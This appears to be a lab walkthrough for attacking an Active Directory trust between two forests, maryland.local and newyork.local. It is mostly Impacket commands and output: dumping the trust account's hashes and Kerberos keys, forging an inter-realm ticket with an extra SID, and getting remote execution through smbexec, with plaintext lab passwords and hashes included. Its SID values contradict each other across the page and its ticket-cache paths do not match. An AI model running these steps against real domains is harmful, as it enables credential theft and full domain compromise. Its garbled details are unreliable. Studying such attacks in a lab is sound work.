Trust ticket with external forest ( maryland.local-> newyork.local)

  • Excatly like we done before on domain forest we can do this on external forest but just like with the golden ticket we need the sid history enabled to exploit.

  • Find the domain sid with lookupsid.py

    • maryland.local SID : S-1-5-21-2203133648-1386395927-1390703624

    • newyork.local SID: S-1-5-21-1409754491-4246775990-3914137275

secretsdump.py -just-dc-user 'NEWYORK$' maryland.local/Carmelo.Anthony:'ballislife'@192.168.56.12
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
newyork$:1105:aad3b435b51404eeaad3b435b51404ee:3efc88864c2ab5cb43747ae949685db2:::
[*] Kerberos keys grabbed
newyork$:aes256-cts-hmac-sha1-96:67bff53c935e4ba7e695b7744a4707f27519f330a10ce9ce88b3df1c51062c33
newyork$:aes128-cts-hmac-sha1-96:1057280d1cc1152e3054558b5244f6d3
newyork$:des-cbc-md5:01a864762326161f
[*] Cleaning up... 
#newyork.local SID
lookupsid.py  -domain-sids north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.10 0

[*] Brute forcing SIDs at 192.168.56.10
[*] StringBinding ncacn_np:192.168.56.10[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-620482180-1620433373-1814187987


#Maryland.local SID
lookupsid.py  -domain-sids maryland.local/Carmelo.Anthony:'ballislife'@192.168.56.10 0

[*] Brute forcing SIDs at 192.168.56.10
[*] StringBinding ncacn_np:192.168.56.10[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-620482180-1620433373-1814187987

  • Create the inter-realm tgt ticket

ticketer.py -nthash 3efc88864c2ab5cb43747ae949685db2 \
 -domain-sid S-1-5-21-620482180-1620433373-1814187987 \
 -domain maryland.local \
 -extra-sid S-1-5-21-620482180-1620433373-1814187987 \
 -spn krbtgt/newyork.local ballislife

  • Ask a service ticket for NYC cifs

export KRB5CCNAME=/home/jefe/delegation/ballislife.ccache
getST.py -k -no-pass -spn cifs/nyc.newyork.local \
 newyork.local/ballislife@newyork.local -debug

  • And enjoy (secretsdump will work too)

export KRB5CCNAME=/workspace/trusts/external/ballislife@newyork.local.ccache
smbexec.py -k -no-pass ballislife@nyc.newyork.local -debug
klist
PreviousGolden ticket with external forest, sid history ftw ( Maryland-> NewYork)NextExploit acl with external trust golden ticket

Last updated